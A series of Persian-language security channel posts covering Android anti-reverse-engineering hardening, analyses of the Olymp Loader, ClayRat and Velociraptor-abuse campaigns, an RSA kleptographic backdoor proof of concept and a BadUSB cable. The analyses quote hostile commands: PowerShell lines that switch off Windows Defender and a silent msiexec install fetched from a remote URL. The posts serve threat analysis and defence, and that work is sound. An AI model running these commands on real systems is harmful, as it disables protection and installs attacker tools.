✅#ReverseEngineeringAndroid_Rust

مهندسی معکوس APK اندروید

سخت‌ترین حالت برای مهندسی معکوس، توسعه اپلیکیشن به صورت Hybrid است که در آن منطق اصلی (Core Logic) به زبان ++C یا ترجیحاً Rust نوشته شده، به صورت کتابخانه Native (.so) کامپایل شده و با استفاده از تکنیک‌های O-LLVM و Virtualization محافظت می‌شود.

تحلیل فنی :

۱. جاوا (Java) و کاتلین (Kotlin): بازنده مطلق

این دو زبان برای توسعه Native اندروید استفاده می‌شوند، اما برای امنیت منطق (Code Logic) بدترین گزینه هستند.

ساختار: کدهای جاوا و کاتلین به Bytecode ماشین مجازی جاوا (JVM/Dalvik) ترجمه می‌شوند.

مهندسی معکوس: با ابزارهایی مثل Jadx، Apktool یا JEB Decompiler، فایل‌های .dex به راحتی به کد منبع (Source Code) تقریبا اصلی برمی‌گردند.

دفاع: استفاده از R8 یا ProGuard فقط نام کلاس‌ها و متغیرها را تغییر می‌دهد (Obfuscation سطحی) که برای یک تحلیلگر با تجربه، مانع جدی نیست.

۲. فلاتر (Flutter): گزینه میانی (مزاحم اما نه غیرممکن)

فلاتر از جاوا/کاتلین امن‌تر است، اما غیرقابل نفوذ نیست.

ساختار: کدهای Dart در حالت Release به صورت AOT (Ahead-of-Time) به کدهای باینری ماشین (Machine Code) کامپایل می‌شوند و در یک فایل کتابخانه بزرگ (معمولاً libapp.so) قرار می‌گیرند.

مهندسی معکوس: مهندسی معکوس فلاتر نیاز به دانش عمیق‌تری از ساختار داخلی Dart VM دارد. ابزارهایی مثل ReFlutter یا اسکریپت‌های Doldrums وجود دارند که می‌توانند Snapshotهای دارت را دامپ کنند. اگرچه کد تمیز به دست نمی‌آید، اما Stringها و منطق کلی قابل استخراج است.

نقطه ضعف: ساختار فلاتر استاندارد است؛ اگر تحلیلگر بداند دنبال چه چیزی بگردد (مثل جداول متدها)، می‌تواند پچ‌های Frida را اعمال کند.

۳. نیتیو (C/++C و Rust) در قالب .so: قلعه دفاعی

این قوی‌ترین روش موجود است. استفاده از NDK (Native Development Kit) باعث می‌شود کد شما مستقیماً به Assembly (معمولاً ARM64) کامپایل شود.

چرا این روش سخت‌تر است؟

از بین رفتن ساختار: اطلاعات سطح بالا (High-level) مثل نام متغیرها، ساختار کلاس‌ها و نوع داده‌ها در فرآیند کامپایل از بین می‌روند. تحلیلگر باید مستقیماً با اسمبلی و رجیسترها در IDA Pro یا Ghidra کار کند.

پیچیدگی جریان کنترل: کامپایلرهای ++C و Rust کدهای بهینه‌سازی شده‌ای تولید می‌کنند که دنبال کردن جریان برنامه (Control Flow) را بسیار دشوار می‌کند.

چگونه اپلیکیشنی بسازیم که "کابوس" تحلیلگران شود؟

برای رسیدن به سطح امنیت مناسب ، تنها استفاده از ++C کافی نیست.پیشنهاد میکنم معماری زیر را پیاده‌سازی کنید:

گام اول: انتخاب زبان (پیشنهاد من: Rust)

به جای ++C، از Rust استفاده کنید.

چرا؟ باینری‌های تولید شده توسط Rust به دلیل نحوه مدیریت حافظه و ماکروها، بسیار پیچیده‌تر و "کثیف‌تر" از ++C هستند. تحلیل آنها در Ghidra برای تشخیص توابع استاندارد بسیار سخت‌تر است. همچنین Rust در برابر آسیب‌پذیری‌های حافظه (Buffer Overflow) که تحلیلگران برای اکسپلویت استفاده می‌کنند، ایمن است.

گام دوم: استفاده از O-LLVM (Obfuscator-LLVM)

کد Native خود را با یک کامپایلر استاندارد بیلد نکنید. از نسخه شخصی‌سازی شده LLVM استفاده کنید تا تکنیک‌های زیر را روی فایل .so اعمال کند:

۔Control Flow Flattening (CFF): ساختار شرطی if/else و حلقه‌ها را به یک ساختار مسطح و پیچیده تبدیل می‌کند که گراف جریان برنامه (CFG) را در IDA Pro غیرقابل خواندن می‌کند.

۔Bogus Control Flow: اضافه کردن بلوک‌های کد جعلی که هرگز اجرا نمی‌شوند اما تحلیلگر را گمراه می‌کنند.

۔Instruction Substitution: جایگزینی دستورات ساده ریاضی (مثل جمع) با فرمول‌های پیچیده ریاضی که همان نتیجه را می‌دهند.

گام سوم: تکنیک‌های Anti-Tamper و Anti-Frida (در سطح Native)

همه چک‌های امنیتی را در لایه Native انجام دهید، نه جاوا.

۔Direct Syscalls: برای انجام عملیات حساس (مثل خواندن فایل یا شبکه)، از توابع استاندارد libc (مثل open, read) استفاده نکنید، زیرا Frida به راحتی آنها را هوک (Hook) می‌کند. مستقیماً از دستورات اسمبلی SVC (در ARM64) برای صدا زدن کرنل استفاده کنید.

تشخیص Frida: اسکن proc/self/maps برای پیدا کردن کتابخانه‌های frida-agent یا پورت‌های باز مربوط به frida-server.

۔TracerPid Check: بررسی وضعیت TracerPid در فایل /proc/self/status. اگر غیر از ۰ باشد، یعنی برنامه‌ای (مثل دیباگر) به اپلیکیشن متصل است. این کار را در یک ترد جداگانه و مخفی انجام دهید.

گام چهارم: رمزنگاری رشته‌ها (String Encryption)

هیچ رشته متنی (مثل URL سرور، کلیدهای API) نباید به صورت Cleartext در فایل .so باشد.

همه رشته‌ها را در زمان کامپایل XOR کنید و فقط در لحظه نیاز در حافظه دیکد کرده و بلافاصله پاک کنید.

نتیجه‌گیری و توصیه اجرایی

برای ساخت امن‌ اپلیکیشن اندرویدی:

رابط کاربری (UI) را با Kotlin یا Flutter بسازید.

تمام منطق حساس، الگوریتم‌ها و ارتباطات شبکه را با زبان Rust بنویسید.

از طریق JNI (در کاتلین) یا FFI (در فلاتر) با لایه Native ارتباط برقرار کنید.

کتابخانه Rust را با فلگ‌های Obfuscation کامپایل کنید.

مکانیزم‌های Anti-Debug و Checksum فایل APK را داخل همان کتابخانه Rust قرار دهید.


📎یک نمونه اپ بسیار ساده از نحوه صدا زدن یک تابع امن Rust در اندروید (از طریق JNI) را برای علاقه مندان نوشته و در ⬅️گیت‌هابم ➡️قرار داده‌ام .

این اپ اندرویدی با rust در نیتیو به آدرس telegram.org ریکوئست میزند . به عمد یک آدرس فیلتر شده و آن هم تلگرام را گذاشته‌ام که با نوع کد نویسی آشنا شوید .

معماری پروژه

لایه Rust: مسئول برقراری اتصال HTTPS (با استفاده از reqwest یا ureq و rustls). این لایه TLS Handshake را خودش انجام می‌دهد که شنود آن سخت‌تر است.

لایه JNI: پل ارتباطی بین کاتلین و Rust.

لایه Kotlin (WorkManager): برای اجرای تسک در پس‌زمینه (Background) بدون نیاز به باز بودن برنامه و سازگار با محدودیت‌های Doze mode از اندروید 10 به بالا.

در گیت‌هاب توضیحات بیشتری است که حتما بخوانید 🔵

⚠️ این پروژه صرفاً با اهداف آموزشی در زمینه امنیت توسعه یافته است. استفاده از این تکنیک‌ها در بدافزارها یا اپلیکیشن‌های مخرب غیرقانونی و غیراخلاقی است.

@NullError_ir

✅#Indirect_Shellcode_Executor

اجراکننده‌ی غیرمستقیم شل‌کد، برای استفاده از آسیب‌پذیری/پیکربندی نادرست موجود در متد ReadProcessMemory از API ویندوز .

@NullError_ir

✅#Olymp_Loader

تهدید نوظهور : تبلیغ سرویس بدافزار جدید در انجمن‌های هکرها با ویژگی‌های ضد تحلیل و تشخیص

تحلیل بدافزار Olymp Loader: سرویس بدافزار (MaaS) مبتنی بر اسمبلی و تکامل مکانیزم‌های FUD

گزارش‌های اخیر از سطح زیرین فروم‌های هکری (Underground Forums) مانند XSS و HackForums حاکی از ظهور یک بدافزار جدید و خطرناک در عرصه Malware-as-a-Service (MaaS) به نام Olymp Loader است. این بدافزار که توسط اپراتوری با نام مستعار OLYMPO توسعه یافته، با ادعای کدنویسی ۱۰۰٪ به زبان اسمبلی ، وعده عملکرد بالا و نرخ تشخیص (Detection Rate) بسیار پایین را به مجرمان سایبری می‌دهد.

ویژگی‌های کلیدی و معماری فنی

برخلاف بسیاری از لودرها که صرفاً یک Wrapper ساده هستند، Olymp Loader یک ابزار چندمنظوره است که نقش Loader، Crypter و Stealer را ایفا می‌کند.

1. زبان و ساختار: توسعه‌دهنده ادعا می‌کند تمام کدها به زبان Assembly نوشته شده‌اند تا مهندسی معکوس (Reverse Engineering) را دشوار کرده و حجم فایل را به حداقل برساند. این ویژگی به عنوان اصلی‌ترین فاکتور فروش برای وضعیت FUD (Fully UnDetectable) تبلیغ می‌شود.

2. تغییر استراتژی (Pivot) در آگوست ۲۰۲۵:

* تا قبل از آگوست، این بدافزار دارای قابلیت‌های Botnet و پنل وب بود.

* در یک تغییر ساختار عمده (Restructuring)، قابلیت‌های بات‌نت حذف و تمرکز کاملاً بر روی Dropper/Loader بودن قرار گرفت.

* مکانیزم جدید: پی‌لود نهایی (مانند LummaC2 یا Raccoon) اکنون مستقیماً درون Stub و به صورت Encrypted تعبیه می‌شود و تنها پس از غیرفعال‌سازی آنتی‌ویروس اجرا می‌گردد.

مکانیزم‌های فرار از تشخیص و Anti-Analysis

تکنیک‌های بکار رفته برای دور زدن دفاع‌های میزبان (Host Defenses) بسیار تهاجمی است:

* غیرفعال‌سازی Windows Defender: بدافزار از دستورات PowerShell و ابزارهای جانبی برای کور کردن سیستم دفاعی استفاده می‌کند:

 
Set-MpPreference -DisableRealtimeMonitoring $true

Set-MpPreference -DisableScanningNetworkFiles $true

Set-MpPreference -DisableIOAVProtection $true

Add-MpPreference -ExclusionPath $env:TEMP

استفاده از ابزار Defender Remover: لودر با دراپ کردن ابزارهایی مانند PowerRun.exe و اسکریپت‌های .reg در دایرکتوری Temp، اقدام به حذف سرویس‌های امنیتی، پاک کردن فایل‌های SecurityHealthSystray.exe و دستکاری فولدر WinSxS می‌کند.

پایداری (Persistence): ایجاد شورتکات در فولدر Startup و کپی کردن خود در مسیر %AppData% با نام‌های رندوم.

ماژول‌های سرقت اطلاعات (Stealer Modules)

سرویس Olymp Loader علاوه بر لود کردن بدافزارهای دیگر، دارای ماژول‌های داخلی قدرتمندی است:

1۔ Telegram Stealer (tgsteal.py):

* نوشته شده به زبان پایتون.

* پروسه‌های تلگرام را می‌بندد (Kill Process).

* با استفاده از Regex به دنبال فایل‌های key_datas می‌گردد و آن‌ها را همراه با اسکرین‌شات ارسال می‌کند.

2۔ Browser Stealer:

* ترکیبی از ++C و پایتون (کامپایل شده با Nuitka).

* مهندسی معکوس نشان می‌دهد که این ماژول نسخه مودیفای شده‌ای از پروژه متن‌باز BrowserSnatch است که لیست تارگت‌های آن دو برابر شده است.

* آرتفکت‌هایی مانند brsteal.dll در دایرکتوری‌های موقت Nuitka قابل مشاهده است.

3۔ Crypto Stealer: هدف قرار دادن کیف پول‌هایی مثل Exodus، Electrum و Atomic.

روش‌های توزیع و شکار (Hunting)

وکتور حمله: استفاده از GitHub Releases جعلی. مهاجمین فایل‌های مخرب را با نام‌های فریبنده مثل NodeJs.exe ، PuTTY یا Zoom در مخازن گیت‌هاب آپلود می‌کنند تا ترافیک شبکه را مشروع (Legitimate) جلوه دهند.

پی‌لودهای نهایی مشاهده شده:

*۔ LummaC2 (۴۶٪)

*۔ WebRAT / SalatStealer (۳۱٪)

*۔ QasarRAT (۱۵٪)

@NullError_ir

✅#RSA_Backdoor_Generator

چند ساعتی است که یک مخزن گیتهاب عمومی شده که یک (Proof of Concept) از حمله معروف
Young & Yung (1996)
به نام
SETUP (Secretly Embedded Trapdoor with Universal Protection)
است که به زبان Go نوشته شده.

این پروژه نشان می‌دهد که چطور می‌توان یک «بکدور نامتقارن» (Asymmetric Backdoor) را درون فرآیند تولید کلید RSA مخفی کرد، به طوری که حتی با داشتن سورس‌کد (الگوریتم) و تحلیل خروجی‌ها، هیچ‌کس جز مهاجم نتواند کلید را بشکند.

### تحلیل فنی و مکانیزم عملکرد (Kleptography)

در حالت عادی، کلیدهای RSA ($n, e, d$) بر اساس دو عدد اول تصادفی $p$ و $q$ ساخته می‌شوند. اما در این ابزار، این اعداد تصادفی نیستند:

1. تزریق (Infection):

* تولیدکننده کلید (Generator) ابتدا یک عدد تصادفی (Seed) به نام $s$ تولید می‌کند.

* عدد اول $p$ از هش $s$ مشتق می‌شود: $p = H(s)$.

* سپس $s$ با استفاده از کلید عمومی مهاجم ($E_{att}, N_{att}$) رمزگذاری می‌شود تا مقدار $c$ بدست آید:

$$c = s^{E_{att}} \pmod{N_{att}}$$

* حالا نکته کلیدی اینجاست: عدد اول دوم ($q$) طوری انتخاب می‌شود که وقتی $n = p \times q$ محاسبه شد، مقدار $c$ (که همان سید رمزگذاری شده است) در بیت‌های بالایی (Most Significant Bits) عدد $n$ قرار بگیرد.

* به زبان ساده: کلید عمومی قربانی، حاوی نسخه رمزگذاری شده کلید خصوصی اوست.

2. استخراج (Extraction):

* مهاجم فقط به کلید عمومی قربانی ($n$) نیاز دارد.

* مهاجم بیت‌های بالایی $n$ را برمی‌دارد (که همان $c$ است).

* چون مهاجم کلید خصوصی خودش ($D_{att}$) را دارد، $c$ را رمزگشایی کرده و $s$ را بدست می‌آورد.

* با داشتن $s$، مقدار $p$ را بازسازی کرده و با تقسیم $n$ بر $p$، کلید خصوصی قربانی را کامل بدست می‌آورد.

### ویژگی‌های کد (Code Analysis)

* زبان: Go (Golang).

* روش ساخت: Brute-force هوشمند. کد آنقدر $q$ های مختلف را امتحان می‌کند تا رابطه ریاضی $n$ طوری تنظیم شود که $c$ در بالای آن قرار گیرد.

* مولفه‌های اصلی:

۔* generator.go: ابزار آلوده برای تولید کلید برای قربانی.

۔* decryptor.go: ابزار مخصوص مهاجم برای استخراج کلید خصوصی از روی کلید عمومی قربانی.

### سطح خطر و اهمیت امنیتی

این حمله کابوس سیستم‌های رمزنگاری است زیرا:

1. غیرقابل تشخیص (Indistinguishable): کلید عمومی تولید شده ($n$) از نظر آماری کاملاً تصادفی به نظر می‌رسد و هیچ تستی نمی‌تواند وجود درب‌خلفی را ثابت کند.

2. انحصاری: برخلاف درب‌های پشتی ساده (مثل استفاده از اعداد اول ثابت)، در اینجا اگر کسی متوجه الگوریتم شود، باز هم نمی‌تواند کلیدهای قربانیان را بشکند، مگر اینکه کلید خصوصی مهاجم را داشته باشد.

3. کاربرد: این متد در حملات زنجیره تأمین (Supply Chain Attacks)، کارت‌های هوشمند (Smart Cards) و ماژول‌های امنیتی سخت‌افزاری (HSM) که "جعبه سیاه" هستند، بسیار محتمل است.

### نتیجه‌گیری

این مخزن اثبات می‌کند که "اعتماد به جعبه سیاه در رمزنگاری اشتباه محض است". اگر شما از یک کتابخانه کامپایل شده یا سخت‌افزار بسته برای تولید کلید استفاده می‌کنید، هیچ راهی برای اثبات اینکه کلید خصوصی شما قبلاً برای سازنده ارسال نشده (یا در دل کلید عمومی مخفی نشده) وجود ندارد.

پتانسل حمله بسیار بالاست ...

@NullError_ir

✅#EvilCrowCableWind

کابل شارژی که دستگاه شما را هک می‌کند
یک BadUSB مبتنی بر ESP32-S3 .
ماژول در حالت STATION پیکربندی شده . شما باید یک نقطه دسترسی وای‌فای با تلفن همراه یا دستگاه دیگری راه‌اندازی کنید، کابل به طور خودکار به آن متصل می‌شود.
اینجا به صورت کامل در موردش (نصب و راه اندازی و غیره ) توضیح داده . ماژول هم که همه جا پیدا میشه ...
زیاد در کابل شارژ و موس و صفحه کلید و غیره پیدا میشه ..

@NullError_ir

✅#Hackers_VelociraptorDFIR

سوءاستفاده هوشمندانه هکرها از ابزار فارنزیک Velociraptor برای C2 و توزیع باج‌افزار

در یک چرخش تکنیکی قابل توجه، هگرها به جای استفاده از بدافزارهای سفارشی برای Command and Control (C2)، به سراغ ابزارهای قانونی و قدرتمند DFIR (Digital Forensics and Incident Response) رفته‌اند. گزارش‌های جدید محققان نشان می‌دهد که ابزار قانونی و محبوب Velociraptor اکنون به سلاحی برای استقرار باج‌افزار Warlock و ایجاد دسترسی پایدار تبدیل شده است.

استفاده از ابزارهای قانونی (Living off the Land) تشخیص را برای تیم‌های SOC بسیار دشوار می‌کند، زیرا ترافیک و پروسه‌های Velociraptor در بسیاری از محیط‌ها "تراست‌شده" و سفید محسوب می‌شوند.

زنجیره حمله (Kill Chain) و تحلیل فنی

مهاجمین در این کمپین‌ها از ترکیبی از آسیب‌پذیری‌های وب، ابزارهای مدیریت سیستم و تانل‌های رمزنگاری شده استفاده کرده‌اند.

# ۱. دسترسی اولیه (Initial Access): بهره‌برداری از SharePoint و WSUS

نقطه ورود در اکثر موارد، اکسپلویت کردن سرورهای Patch نشده بوده است:

*۔ ToolShell Chain: استفاده از زنجیره آسیب‌پذیری SharePoint. ابتدا بای‌پس احراز هویت (CVE-2025-49706) و سپس اجرای کد از راه دور (CVE-2025-49704). مهاجمین فایل‌های سیستمی شیرپوینت مانند start.aspx یا ToolPane.aspx را به Web Shell تبدیل کرده‌اند.

*۔ WSUS Exploitation: در برخی موارد، اکسپلویت CVE-2025-59287 روی سرویس WSUS مشاهده شده است.

# ۲. استقرار C2 با Velociraptor

پس از نفوذ، مهاجم با استفاده از دستورات msiexec ، نسخه‌های MSI ابزار Velociraptor را از دامنه‌های Cloudflare Workers دانلود و نصب می‌کند:
msiexec /q /i https:// [REDACTED] .workers .dev/ v3 .msi

> نکته فنی: از آنجایی که Velociraptor به عنوان یک سرویس ویندوز نصب می‌شود، مهاجم بلافاصله دسترسی سطح SYSTEM و Persistence (پایداری) را به دست می‌آورد. این ابزار دقیقاً برای اجرای دستورات سطح پایین و کوئری گرفتن از سیستم طراحی شده که اکنون در خدمت مهاجم است.

# ۳. تانلینگ پیشرفته: دور زدن فایروال با VS Code و Cloudflare

برای مخفی ماندن ترافیک C2، مهاجمین از تکنیک‌های هوشمندانه‌ای استفاده کردند:

*۔ VS Code Tunnels: دانلود و نصب code.exe (نسخه CLI ویژوال استودیو کد). از آنجا که این باینری توسط مایکروسافت امضا شده (Signed Binary)، توسط بسیاری از EDRها مسدود نمی‌شود. مهاجم با دستور tunnel service install یک تانل معکوس به سمت خود ایجاد می‌کند.

*۔ Cloudflare Tunnels: استفاده از cloudflared.exe برای ایجاد تانل‌های خروجی امن که ترافیک مخرب را در دل ترافیک HTTPS قانونی مخفی می‌کند.

تحلیل رفتاری و اشتباهات عجیب مهاجم 🥴

در جریان بررسی لاگ‌ها، چندین اشتباه مبتدیانه از سمت مهاجم (احتمالاً گروه Storm-2603) مشاهده شد که نشان می‌دهد حتی گروه‌های باج‌افزاری پیشرفته نیز دچار خطای انسانی می‌شوند:

* تایپ دستورات لینوکسی در ویندوز: مهاجم دستور cat را در محیط CMD ویندوز اجرا کرده است!

* فراموشی سینتکس: تلاش برای ساخت یوزر ادمین (net user adminbak ... ) بدون سوئیچ /add که منجر به خطای دستور شد.

* تلاش‌های ناموفق: تلاش برای اجرای سرویس SSH قبل از نصب شدن آن روی سیستم.

باج‌افزار Warlock

هدف نهایی در یکی از این نفوذها، استقرار باج‌افزار Warlock بوده است. این باج‌افزار که از ژوئن ۲۰۲۵ فعال شده، پس از تثبیت دسترسی از طریق Velociraptor و غیرفعال کردن Windows Defender، اقدام به رمزگذاری فایل‌ها می‌کند. نکته جالب اینجاست که در Note باج‌افزار، به دروغ ادعا شده نفوذ از طریق WSUS بوده، در حالی که شواهد فنی نفوذ از طریق SharePoint را تایید می‌کند (تکنیک Misdirection).

>> راهکارها

برای مقابله با این سبک از حملات که از ابزارهای مجاز سوءاستفاده می‌کنند، باید روی Behavioral Analytics تمرکز کنید:

۱. مانیتورینگ پروسه‌های فرزند IIS:

پروسه w3wp.exe نباید پروسه‌هایی مانند cmd.exe ، powershell.exe یا msiexec.exe را اسپان (Spawn) کند. این نشانه قطعی وجود Web Shell است.

۲. بررسی نصب‌کننده‌های MSI:

اجرای msiexec که به URLهای خارجی (به خصوص دامنه‌های workers.dev یا github.io) اشاره دارد را بلاک کنید.

۳. شناسایی ابزارهای مدیریتی غیرمجاز:

اگر در سازمان شما از Velociraptor استفاده نمی‌شود، وجود پروسه یا سرویس آن باید بلافاصله به عنوان Incident تلقی شود.

۴. کنترل تانل‌ها:

ترافیک خروجی code.exe یا cloudflared.exe را در فایروال لبه شبکه محدود کنید و آرگومان‌های خط فرمان code.exe را برای کلمه کلیدی tunnel مانیتور کنید.

@NullError_ir

✅#ClayRat

تحلیل بدافزار ClayRat:
نسل جدید جاسوس‌افزارهای اندرویدی با قابلیت دور زدن Play Protect

تیم تحقیقاتی زیمپریوم اخیراً از یک تروجان دسترسی از راه دور (RAT) جدید تحت عنوان ClayRat پرده برداشته است که سطح جدیدی از پیچیدگی در تهدیدات موبایلی را به نمایش می‌گذارد. این بدافزار که اولین بار در اکتبر ۲۰۲۵ شناسایی شد، با هدف‌گیری کاربران از طریق جعل برنامه‌های محبوب (مانند YouTube، تلگرام و اپلیکیشن‌های خدماتی روسی) و توزیع از طریق دامین‌های فیشینگ و حتی سرویس‌های ابری مثل Dropbox، به سرعت در حال گسترش است.

مکانیزم عملکرد و فرار از شناسایی (Defense Evasion)

بدافزار ClayRat از یک تکنیک پیشرفته Dropper برای عبور از سدهای امنیتی اندروید استفاده می‌کند. برخلاف بدافزارهای سطح پایین، Payload مخرب اصلی در این بدافزار به صورت رمزنگاری شده با الگوریتم AES/CBC و کلیدهای تعبیه‌شده (Embedded Keys) در پوشه Assets برنامه مخفی می‌شود و تنها در زمان اجرا (Runtime) استخراج و فعال می‌گردد. این تکنیک باعث می‌شود آنالیز استاتیک و شناسایی امضا توسط آنتی‌ویروس‌های معمولی دشوار شود.

سوءاستفاده از Accessibility Services

خطرناک‌ترین ویژگی ClayRat، بهره‌برداری تهاجمی از سرویس‌های دسترسی‌‌پذیری (Accessibility) است. پس از فریب کاربر برای اعطای این مجوز به همراه مجوز پیش‌فرض SMS، بدافزار اقدامات زیر را انجام می‌دهد:

۱. غیرفعال‌سازی Google Play Protect: بدافزار با شبیه‌سازی کلیک‌های کاربر، وارد تنظیمات شده و سپر امنیتی گوگل را بدون اطلاع قربانی خاموش می‌کند.

۲. سرقت اعتبارنامه قفل صفحه: تمامی تعاملات کاربر با صفحه قفل (Lock Screen) مانیتور می‌شود. الگوها (Patterns)، پین‌کدها و پسوردها با دقت بالا بازسازی شده و در SharedPreferences (تحت کلید lock_password_storage) ذخیره می‌شوند.

۳. بازگشایی خودکار (Auto-unlock): با استفاده از اعتبارنامه‌های سرقت شده، بدافزار می‌تواند مکانیزم امنیتی صفحه قفل را دور زده و دسترسی مداوم خود را حفظ کند.

قابلیت‌های جاسوسی و Exfiltration

پس از استقرار کامل، ClayRat دسترسی کاملی به داده‌های قربانی پیدا می‌کند:

* سرقت کامل پیامک‌ها (SMS) و لیست تماس‌ها.

* شنود و رهگیری نوتیفیکیشن‌ها (برای سرقت کدهای 2FA).

* ضبط صفحه نمایش با استفاده از MediaProjection API.

* عکس‌برداری مخفیانه با دوربین دستگاه.

...

شماهایی که سریع دست به اس.لحه (صفحه‌کلید ... ) هستین حتما نگهبانی گماشتین دیگه . با دسترسی به AccessibilityService و ایجاد آپشن‌های مختلف رصد کنید و تحلیل رفتار پویا داشته باشید .

@NullError_ir

🔴 🔅 ⚙️

Decoded رمزگشایی


هنر ریاضیات

بازی/سرگرمی/شطرنج/علاقه/گفتگو/زبان نوابغ

بیچاره شاگردی که از استادش بهتر نشود .